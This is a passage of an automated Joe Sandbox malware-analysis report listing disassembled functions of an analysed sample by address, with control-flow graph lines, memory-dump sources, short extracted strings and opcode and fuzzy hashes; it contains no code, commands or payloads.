                                          • Not Executed
                                          control_flow_graph 0 619cb3-619cb8 1 619c8e-619c96 call 61a090 0->1 3 619c9b-619cd6 1->3 3->1
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: 7b0784853b4aaf0902ab3269bf40bd00cd8000ba2ea57af9748f4851a96eac73
                                          • Instruction ID: 8b5547f2a204412f90c5dca6d0d8a0e6a5f8a53b728f04ec7b6c9c81336d7b7e
                                          • Opcode Fuzzy Hash: 7b0784853b4aaf0902ab3269bf40bd00cd8000ba2ea57af9748f4851a96eac73
                                          • Instruction Fuzzy Hash: CFB012E125D2006E3548E9A51D06DB6028FC2C4B217349C2EF444C6040D8401C8120B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00619CDB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 14 619cdb-619ce0 15 619c8e-619c96 call 61a090 14->15 17 619c9b-619cd6 15->17 17->15
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: d4eddec529b86579db240a62e4e075327b7ff53e783bd3c00a1c5542ae2eef26
                                          • Instruction ID: 59cdfa54097ed9e8f8fc9807af8e79f3b6f4edd0dd93af7db560570340f8e4cd
                                          • Opcode Fuzzy Hash: d4eddec529b86579db240a62e4e075327b7ff53e783bd3c00a1c5542ae2eef26
                                          • Instruction Fuzzy Hash: 69B012E135D2006E3158E5961D02DB6024FD1C4B21734482EF044C6080D8401CC120B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00619CBD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 619cbd-619cc2 6 619c8e-619c96 call 61a090 5->6 8 619c9b-619cd6 6->8 8->6
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00619C96
                                            • Part of subcall function 0061A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0061A09B
                                            • Part of subcall function 0061A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0061A103
                                            • Part of subcall function 0061A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0061A114
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1627785191.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                          • Associated: 00000000.00000002.1627722929.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627820635.000000000062F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627845730.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1627871097.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_610000_00023948209303294#U00ac320302282349843984903.jbxd
                                          Similarity
                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                          • String ID:
                                          • API String ID: 697777088-0
                                          • Opcode ID: 44cdff5774529d7dd44ae710a520472404132d5af9ed8141aa3a4096d595b7f6
                                          • Instruction ID: d8b266179756d9d17cabfc14195bffc9f82489cbb6d400eb4cd3fe13c3bb6350
                                          • Opcode Fuzzy Hash: 44cdff5774529d7dd44ae710a520472404132d5af9ed8141aa3a4096d595b7f6
                                          • Instruction Fuzzy Hash: 80B012E225D2006E3548E9951D02DB6028FD1C4B21734582FF044C6040D8401C8120B7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 00007FFD9B8A0F18 Relevance: 3.4, Strings: 2, Instructions: 945COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: rS_H$wS_H
                                          • API String ID: 0-1007948726
                                          • Opcode ID: e435df7329ad9d6fa337288efd1641b7ce566c4ef7209c6202f45adbdf9f32be
                                          • Instruction ID: 2ff9ce7d545e59f59036d7b6038c7011e464e8e1524bbfa0a903be3759459e36
                                          • Opcode Fuzzy Hash: e435df7329ad9d6fa337288efd1641b7ce566c4ef7209c6202f45adbdf9f32be
                                          • Instruction Fuzzy Hash: A6424B31B1D90E0FE7789BAC986167973D1EF98350F15027AD45EC32E6ED29AC438391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A0F25 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 3M_^$4M_^
                                          • API String ID: 0-579734165
                                          • Opcode ID: 7ea32ae816dea5259fcc26e5b009641c7f67ef981213b9c9459be5346d22ddaa
                                          • Instruction ID: c9e6395327653413e8724eae833e225d81a3e705d1ff2c5065d55d5b5a7b0ee9
                                          • Opcode Fuzzy Hash: 7ea32ae816dea5259fcc26e5b009641c7f67ef981213b9c9459be5346d22ddaa
                                          • Instruction Fuzzy Hash: 72C1DA63B0A1B64AD71AB7BCBCB68E97790DF0222C70942F7D0DD8B0D7ED0864478294
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8C312D Relevance: 1.2, Instructions: 1161COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a3208ce75ef984d075bf225e20da8b59bc194d9ba72ee7f56af23b130d2074d
                                          • Instruction ID: 14059e9a1cee5d007efc240fbdf0e2aee292959a079097c7bbb2bad37e766463
                                          • Opcode Fuzzy Hash: 7a3208ce75ef984d075bf225e20da8b59bc194d9ba72ee7f56af23b130d2074d
                                          • Instruction Fuzzy Hash: C482B2B0A19B0A8FD768EF18C492575B7E1FB58314B14456EC0CBC7AA6DB35F8438B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AB07D Relevance: .7, Instructions: 728COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a3fe052f37e5f529a9b8f06a7bec2a1266d113850c9da3f9f638651c7fcfedb
                                          • Instruction ID: be28d141828d10de9c193e20c3518faa3df6785e6abec0b86d049e029e717c47
                                          • Opcode Fuzzy Hash: 1a3fe052f37e5f529a9b8f06a7bec2a1266d113850c9da3f9f638651c7fcfedb
                                          • Instruction Fuzzy Hash: 28223831B1D94A4FE798EB6C9465A7D73D2EF98310F4501BAE40DC32E6DE28ED428351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A8825 Relevance: 4.2, Strings: 3, Instructions: 413COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_^$L_^$L_^
                                          • API String ID: 0-111135195
                                          • Opcode ID: 05cbc9931f1e6a149a543a08874c82b0689dbde8a10697a56ebc09481fa729ef
                                          • Instruction ID: e5ae7c428a5cd4581218aa3d41112c8b129c9e7cc9e990c78f31683a407d0188
                                          • Opcode Fuzzy Hash: 05cbc9931f1e6a149a543a08874c82b0689dbde8a10697a56ebc09481fa729ef
                                          • Instruction Fuzzy Hash: 3BC18B72B0E94E4FD799EB6CA8A55F97791FF88308B4801BAD05DC71D7ED24A8038351
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8BC7E0 Relevance: 2.9, Strings: 2, Instructions: 369COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PK00$ZK_H
                                          • API String ID: 0-3853493638
                                          • Opcode ID: 0ac67ec3f8eab8fff54cd8915c4dfd870d2cf1558bd31dfa874e17ccb01fed85
                                          • Instruction ID: ef0970f7652d7112ec8280f0b022b872fca07ade2aabfcd9c8b8650e9adce513
                                          • Opcode Fuzzy Hash: 0ac67ec3f8eab8fff54cd8915c4dfd870d2cf1558bd31dfa874e17ccb01fed85
                                          • Instruction Fuzzy Hash: 2FB1F661B1D9294FE7B8D76CE46867973C1EF5C310F0641BAE04EC32A6DD24AD418BC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8C4D55 Relevance: 2.8, Strings: 1, Instructions: 1511COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: VUUU
                                          • API String ID: 0-2040033107
                                          • Opcode ID: 941a67ea2a91e3ecc0159f8e02c4ff72a6e4f7a30f8dae8ce20550f295e49094
                                          • Instruction ID: 4043d6ed6a684b0dbfac0ace30dc774127d54da1142688c82c40db2e71f90639
                                          • Opcode Fuzzy Hash: 941a67ea2a91e3ecc0159f8e02c4ff72a6e4f7a30f8dae8ce20550f295e49094
                                          • Instruction Fuzzy Hash: 67B203B0A2C7498BD72DDF18C4925B9B7E1FB99300F15463EC8DB83656DA34B8538B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A0E30 Relevance: 1.7, Strings: 1, Instructions: 454COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_H
                                          • API String ID: 0-402390507
                                          • Opcode ID: 8079637c2faf011503a643d49d889738ded4b0d85219aac273d3e56c16ac245c
                                          • Instruction ID: cc7f6a822b8526ef8aca0e7609eab84cf23792d0d5151471de305b7ecc8551ed
                                          • Opcode Fuzzy Hash: 8079637c2faf011503a643d49d889738ded4b0d85219aac273d3e56c16ac245c
                                          • Instruction Fuzzy Hash: 8FD19D3170DA098FD7A8EB2CD4A996577E2FF9931071501BEE04EC72A6DE25EC82C741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B98C8 Relevance: 1.7, Strings: 1, Instructions: 418COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0K_H
                                          • API String ID: 0-3901017509
                                          • Opcode ID: 361daa2c985e84b18ac7a3dfb02deaafe35c2b4534e49183ecf21c8f18f59f58
                                          • Instruction ID: 4448c84b1e53c4d8405addc2baf599195932ac4d18e29a538e1b752d919e354b
                                          • Opcode Fuzzy Hash: 361daa2c985e84b18ac7a3dfb02deaafe35c2b4534e49183ecf21c8f18f59f58
                                          • Instruction Fuzzy Hash: 16C1E431B1DA5E0FEBACEB2C94656B573D1EF99310B0501BAD44EC32E7ED25AD428780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8BA1FB Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: p
                                          • API String ID: 0-2181537457
                                          • Opcode ID: 40e24d12611973fb1ebee029ba148c780cec95f1d6d3b2f5ab8da33ea4ac93fe
                                          • Instruction ID: 02f1c167b5c83308710b778f827754b57a720f7de01773d79eaf41f644ba2734
                                          • Opcode Fuzzy Hash: 40e24d12611973fb1ebee029ba148c780cec95f1d6d3b2f5ab8da33ea4ac93fe
                                          • Instruction Fuzzy Hash: 57B16A32B0EA9E1FE769A77C68655F97B90EF5931470502FBD05DC71E7EC28A8028380
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B4CAD Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TR_H
                                          • API String ID: 0-1329018126
                                          • Opcode ID: 947dcad92d1b2698f3e6032a3cd6d31f7eedb8bc21a5a8f061e03dd2d7bbec44
                                          • Instruction ID: 6150accaf7256f6bfd5475a05e041a097e97d2cfae8c2730e02d3b5a9c6487ff
                                          • Opcode Fuzzy Hash: 947dcad92d1b2698f3e6032a3cd6d31f7eedb8bc21a5a8f061e03dd2d7bbec44
                                          • Instruction Fuzzy Hash: B091E662B1EE5D0FEBA5A76C54661B827D2EFDC75070902BEE04DC32E7ED186D024781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A84F2 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_^p
                                          • API String ID: 0-3814412530
                                          • Opcode ID: 9252fb246942cdfc52f9683c89ae4f307d54f1bb4eeb90d4ca46c507170aca01
                                          • Instruction ID: dedda7e25574e4770519f21a13171aa64315cf1f0a7b6d676077a80bf29befda
                                          • Opcode Fuzzy Hash: 9252fb246942cdfc52f9683c89ae4f307d54f1bb4eeb90d4ca46c507170aca01
                                          • Instruction Fuzzy Hash: 82914B31B1E6894FDB69DB6848225B87FE0EF99300B1503FFD099C7193DA28D9078792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A3A69 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L_H
                                          • API String ID: 0-402390507
                                          • Opcode ID: 9cae92e79b697429b38fca79cb54bbb71e1ada5f39c1d74fc8e2f7e91dda3610
                                          • Instruction ID: 5709f55e856adfe8955e39a8016b7d434d2ba52f7d7092fc0073974f3c5bcf7e
                                          • Opcode Fuzzy Hash: 9cae92e79b697429b38fca79cb54bbb71e1ada5f39c1d74fc8e2f7e91dda3610
                                          • Instruction Fuzzy Hash: F3510521B0EE4A5FE7A5DB68846566577E2EF99310B1901BEC04DC72E2DE28BD428390
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8C0538 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: cCK_^
                                          • API String ID: 0-3585569345
                                          • Opcode ID: dd5766117790bc659debc6b5cc48b86c26bcc10bcd7a82399bfad8603029c71d
                                          • Instruction ID: 7a9310fa9546e87742c445432a0dcf2b3c2a9c988ea7013ff7d91b20fcef166c
                                          • Opcode Fuzzy Hash: dd5766117790bc659debc6b5cc48b86c26bcc10bcd7a82399bfad8603029c71d
                                          • Instruction Fuzzy Hash: DF416DB271EA4D0FE7A8AB6CA8755B477D0EF99750F0601FBD009C71E2ED196D428381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8ACBD0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: YL_H
                                          • API String ID: 0-2883937193
                                          • Opcode ID: 74226f1d230a8ceafede2da5509e29ca2e4adc3d7f6a8ef28e2b33a41b9c984f
                                          • Instruction ID: c5d92613461b14a41856f6df499b6c865c457139e1a3acdc4da42ee90138ae45
                                          • Opcode Fuzzy Hash: 74226f1d230a8ceafede2da5509e29ca2e4adc3d7f6a8ef28e2b33a41b9c984f
                                          • Instruction Fuzzy Hash: D3117A63B0AC4E0BD7A8926D7C596E573D0EF9C260B0405BBE41DC3099ED256C828780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B7F13 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: cK_^
                                          • API String ID: 0-313613140
                                          • Opcode ID: ded1aba1b671354ed2f2dd424e11c44df6197953ce33fb5a380ab915bf431d64
                                          • Instruction ID: b9628db2167473ec702bbf539a127266b10d05cba3a81547fa95b97660366a16
                                          • Opcode Fuzzy Hash: ded1aba1b671354ed2f2dd424e11c44df6197953ce33fb5a380ab915bf431d64
                                          • Instruction Fuzzy Hash: 5EC0805374EC5D15E590579C7C554E9F381E7D83A1F824377F04AC1155DC0C794706C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AF61F Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: +`L_^
                                          • API String ID: 0-184317852
                                          • Opcode ID: 263aa57eb6dfa1fe82eb17709a6262991fd9dd2f114cdf0ae8df5887b2d23917
                                          • Instruction ID: e34d3ea97fa77c31d8aaadf705d42a1774dbf73f30e66c80287508abc51c11d1
                                          • Opcode Fuzzy Hash: 263aa57eb6dfa1fe82eb17709a6262991fd9dd2f114cdf0ae8df5887b2d23917
                                          • Instruction Fuzzy Hash: ADC0123255DE4D46C741A794E861CDAB754EF90254F801E3AF04B910A9DD5866858682
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8AE9CC Relevance: 1.0, Instructions: 962COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef64db938cd9c820b758340dc7265b31904289cb3a493383b1985404eae8bfcb
                                          • Instruction ID: d2841e2ff184a30f9b451adb9c2e8b1970005a19132c03c69e53610344711b66
                                          • Opcode Fuzzy Hash: ef64db938cd9c820b758340dc7265b31904289cb3a493383b1985404eae8bfcb
                                          • Instruction Fuzzy Hash: 8B62A131B19A4E4FDB98EF58C8A4AB973E2FF98300F1445A9D41DC32E6DE34A942C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B1969 Relevance: .8, Instructions: 770COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8589bac979976946c79ea2210465b874a12e8a9b80ebd96cf4fb7ab746675036
                                          • Instruction ID: 67606fe913d7db37767f6902b87896561963378516acbedf089b0cb6cc647494
                                          • Opcode Fuzzy Hash: 8589bac979976946c79ea2210465b874a12e8a9b80ebd96cf4fb7ab746675036
                                          • Instruction Fuzzy Hash: E2226962B2EE5E0BE7A8B76C68761B437C1EF99350B0541BAD04DC72E7ED18BD0246C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8A1375 Relevance: .6, Instructions: 620COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80321f90ca3f9956f85880e6aa3d81c12fa6e9d28077e63cf9abbffa192c171a
                                          • Instruction ID: cd55e4ea23fcd53aa50f6c516a6df15c1793672b24acba225f90cf9caa0d6cb5
                                          • Opcode Fuzzy Hash: 80321f90ca3f9956f85880e6aa3d81c12fa6e9d28077e63cf9abbffa192c171a
                                          • Instruction Fuzzy Hash: 69124B52B1FA8D0FEBA9BF6C84659783BD1DF69740B0501BEE14DC31D3DD28AA468341
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8BB660 Relevance: .6, Instructions: 620COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c2971bf80cdfc7cf95ae7e724ffbfbd9e5f2fa88f8c56d4b749d3b84154461d
                                          • Instruction ID: f957f01a490150437a8c5403f8979d3ec3957342558c7e48af2ed86e1fec22d6
                                          • Opcode Fuzzy Hash: 4c2971bf80cdfc7cf95ae7e724ffbfbd9e5f2fa88f8c56d4b749d3b84154461d
                                          • Instruction Fuzzy Hash: 96020961B2DA4D0FEBA8EB6C586567963D1EF9C790F15017BD44EC32E7ED18AD028340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8C1425 Relevance: .6, Instructions: 613COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4a84ae3adea9b1671a434333e93760689c6022fc23bfb2f7853312b279086318
                                          • Instruction ID: 15f008fe7c2c4220bf4c30612b8c86317abcce5fa8859c464bcab7b8b31d5bec
                                          • Opcode Fuzzy Hash: 4a84ae3adea9b1671a434333e93760689c6022fc23bfb2f7853312b279086318
                                          • Instruction Fuzzy Hash: 5E12E2B1B1AA094FE7B8F76894A567573D1EF58740F1501BED08EC32E6EE28BD428740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFD9B8B65B9 Relevance: .5, Instructions: 519COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1685623432.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ffd9b8a0000_Update.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0da822b354048cc5f618d69fd3925ff4efc7eb3ecb54773ba8b35b181eddb6ca
                                          • Instruction ID: 22e6b817cd38f49c57c0b5ee6b2b80b4000fbe80e5de35e0d0ea665ad10e8d08
